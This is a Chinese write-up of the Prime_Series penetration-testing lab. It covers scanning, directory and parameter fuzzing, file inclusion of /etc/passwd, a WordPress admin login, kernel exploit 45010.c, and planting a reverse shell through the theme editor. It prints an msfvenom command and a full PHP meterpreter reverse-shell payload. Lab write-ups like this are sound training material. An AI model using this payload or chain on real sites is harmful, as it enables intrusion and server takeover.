当前位置:网站首页>Prime_Series靶场从探测到提权
Prime_Series靶场从探测到提权
2022-07-28 05:20:00 【cainsoftware】

靶场开机就这 做的是NET的网卡跟我kali是一个网络 网络 192.168.34.0的
题目要求是同C段但是不知道ip地址
故直接nmap 扫描 目标服务器ip地址和开放服务和端口

没啥技术含量 可以看见ip为192.168.34.130的开放了 22 80 的2个服务 且网络容器是apache

drib这里直接爆破目录

可见是一个wordpress的系统

二次扫描 -X 参数 [.txt] [.php]的意思在爆破后缀添加 以.txt结尾和.php结尾

这里出现三个文件 image.php index.php 和 secret.txt
访问secret.txt 提示可以用FUZZ那么 就使用wfuzz直接爆破试试

这里太多 用 -h命令可以过滤

变量名为file 加上变量重新访问一次

产生变化 之前在对于txt的请求的时候 意思fuzz变量后 location.txt 对它发起请求 所以试一下

这里可以看见 有多加了个变量为 secrettier360 (这是不是360公司发国外的靶机啊 理论没道理啊)

在放到imge使用这个变量 可以越权访问 passwd文件 且在文件中有一行提示为
![]()
访问这个目录

获得关键性密码 follow_the_ippsec
这个密码是 wp的后台密码 打开 刚刚扫描出来的 wp的后台地址
这里对于wp的工具 有2个 以下为效果截图 (cmseek wpscan)

在使用wpscan 添加 -e 模块扫描用户时可见


所以登陆用户名为 victor 密码就是 follow_the_ippsec

进入后台 在这里选择模板编辑 可以找到提权点
利用msfenom生成反弹木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.34.130 lport=4444 -f raw -o shell2.php
复制生成的代码 注意不要将 /*开头复制进去
<?php /**/ error_reporting(0); $ip = '192.168.34.130'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); 
放到wp后台并等待访问执行木马

该文件位置是
运行msf设置好监听模块

启动监听

反弹成功 容器权限是 www-data 低权限 os是 4.15的乌班图
用msf查找对应的EXP打一下
通过搜索 可见这个POC符合当前环境

45010.c
. c文件是需要用gcc编译的 所以定位这个文件 复制出来 编译

把这个cain丢目标服务器上
加权限提权

这靶场只能打一次 用这个poc就拉闸 就会内核溢出 这里就不欢迎了 贴个之前操作的图 总没问题吧
边栏推荐
猜你喜欢

DOM基础

在线词云图生成(以WordArt为例)

Flex elastic box item properties

(php毕业设计)基于php学生作业提交管理系统获取

Some problems of ArcGIS Engine Installation

常见WAF拦截页面总结

Acquisition of mental health service system based on PHP (PHP graduation design)

CAD-GIS数据转换

Review of metallurgical physical chemistry --- electrodeposition and reduction process of metals

基于Highcharts平台的桑基图(Sankey diagram)绘制
随机推荐
蓝桥代码 翻硬币(我这样写也通过了,官网测试是不是有问题)
Online word cloud generation (taking WordArt as an example)
书籍-邓普顿教你逆向
js-promise实现逻辑
抖音-视频步骤
Thinking on Architecture Design (SSO design)
(php毕业设计)基于php在线旅游网站管理系统获取
反弹shell的N种姿势
南京邮电大学CTF题目writeup (二) 含题目地址
Screenshot transferred to the background
结果填空 马虎的算式(暴力解决)
cmd和npm基础命令
Review of metallurgical physical chemistry -- Fundamentals of metallurgical reaction kinetics and characteristics of multiphase reaction kinetics
JS字符串方法大全
NRF51822 回顾总结
结果填空 第39级台阶(递归*C语言)
Community epidemic access management system based on PHP (PHP graduation design)
结果填空 星系炸弹(Excel秒杀)
(php毕业设计)基于php学生日常行为管理系统获取
360兼容问题